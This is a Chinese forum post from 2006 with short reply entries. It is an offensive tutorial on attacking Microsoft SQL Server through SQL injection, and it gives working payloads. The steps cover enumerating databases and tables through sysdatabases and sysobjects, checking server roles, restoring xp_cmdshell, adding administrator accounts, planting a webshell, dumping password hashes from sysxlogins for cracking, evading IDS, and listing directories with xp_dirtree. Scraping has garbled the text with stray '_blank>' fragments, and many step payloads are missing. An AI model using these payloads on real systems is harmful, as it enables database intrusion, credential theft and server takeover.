2.猜表一般的表的名称无非是admin adminuser user pass password 等..
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
6.猜解字符
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 
看_blank>服务器打的补丁=出错了打了SP4补丁
看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
看xp_blank>_cmdshell是否删除
xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复
反向PING自己实验
加帐号
创建一个虚拟目录E盘:
访问属性:(配合写入一个webshell)
爆库 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的_blank>数据库名
得到WEB路径
建立image类型的表cmd
存在xp_blank>_cmdshell的测试过程:
如果被限制则可以。
查询构造:
上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
枚举出数据表名
这是将第一个表名更新到aaa的字段处。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name< >刚才得到的表名)。
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,一个个的读出,直到没有为止。
读字段是这样:
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入_blank>漏洞建_blank>数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
update 表名 set 字段= (select top 1 col_blank>_name(object_blank>_id(要查询的数据表名),字段列如:1) [ where 条件]
绕过IDS的检测[使用变量]
1、 开启远程_blank>数据库
基本语法
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
3.复制目标主机的整个_blank>数据库 insert所有远程表到本地表。
基本语法:
复制_blank>数据库:
复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
写入表:
语句1:and 1= (SELECT IS_blank>_SRVROLEMEMBER(sysadmin));--
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER (serveradmin));--
语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));--
语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER (securityadmin));--
语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));--
语句7:and 1= (SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER (bulkadmin));--
语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));--
把路径写到表中去:
把_blank>数据库备份到网页目录:下载
xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
返回的信息有两个字段 subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果, 一步步达到我们想要的信息!
~
[ 本帖最后由 我菜也 于 2006-12-31 14:51 编辑 ]
最新回复
zmalqp000 (2006-12-31 16:38:15)
stephen08 (2006-12-31 18:36:12)
~~
sudami (2006-12-31 23:08:01)
回家该看看网站设计了...
惭愧啊...
我菜也...
注射器 (2006-12-31 23:11:26)
wskjwh (2007-1-01 00:17:30)
oxyzo (2007-1-01 00:41:50)
我菜也 (2007-1-03 13:03:40)
短小精干 (2007-1-03 19:21:08)
我来接你!
zzdwilliam (2007-1-04 11:09:37)
jackieasy (2007-1-04 11:15:53)
陌路风雨 (2007-1-05 00:09:13)
winron (2007-1-05 01:31:43)
时尚网赚 (2007-2-21 01:29:57)
时尚网赚 (2007-2-21 01:33:06)
duoter (2007-2-21 04:07:35)
abchehehe32 (2007-2-21 11:24:54)
楼主检查下
200523710 (2007-2-21 12:26:28)
foxblack (2007-2-21 12:33:20)
ipkf (2008-6-25 16:29:16)
liuyuan888 (2008-6-25 16:35:59)
可惜了看不了!!!